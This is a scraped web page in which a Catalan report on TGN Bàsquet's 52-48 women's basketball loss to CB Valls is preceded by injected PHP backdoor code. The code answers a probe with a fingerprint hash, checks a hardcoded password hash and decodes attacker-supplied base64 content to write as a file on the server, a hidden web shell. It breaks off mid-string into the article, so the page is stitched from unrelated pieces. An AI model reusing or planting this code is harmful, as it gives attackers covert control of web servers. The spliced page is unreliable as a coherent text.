function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet, molt desencertat, perd davant d'un còmode CB Valls jugant a casa (52-48) - Tgn Bàsquet Club -

El TGN Bàsquet, molt desencertat, perd davant d’un còmode CB Valls jugant a casa (52-48)

Updated: febrer 1, 2022

El Sènior del TGN Bàsquet va estar molt desencertat en un partit on el CB Valls no en va perdonar ni una. Les vallenques, ja des del principi van sortir molt posades, amb ganes de guanyar un derbi que pels resultats havia de decantar-se pel TGN. Però com va dir Víctor Neila, els derbis són enfrontaments que s’escapen de la lògica, on pot passar qualsevol cosa i on els nervis juguen un paper important. En aquest primer període el CB Valls va posar les cartes sobre la taula i va deixar clares les seves intencions guanyadores (18-9). Les liles durant tot el primer quart van anar a remolc de les locals, i amb moltes dificultats per trobar bones opcions en atac. Malgrat el pèssim inici, les tarragonines es van despertar a temps i durant el segon quart van aconseguir remuntar amb un parcial de 9-21, marxant al descans guanyant per tres punts (27-30).

La sortida al tercer període va ser molt bona. Amb un avantatge màxim de 9 punts, semblava que les visitants havien sabut reconduir el partit, però una ràpida reacció de les del Valls, que va arribar a anotar fins a 9 triples, van fer que el quart quedés empatat (11-11). Les jugadores d’en Neila, a les quals els va costar molt atacar contra una defensa amb molts contactes, van ser capaces de circular la pilota i trobar bones opcions, que desgraciadament van acabar en cistelles fallades.

Finalment, el CB Valls es va endur el matx gràcies a la seva concentració, una ratxa de triples i el desencert de les del TGNNeila lamenta la falta d’encert en moments importants i és conscient que l’equip no va fer un bon partit. Amb aquesta merescuda victòria les blanc-i-roges en sumen dues en tota la temporada.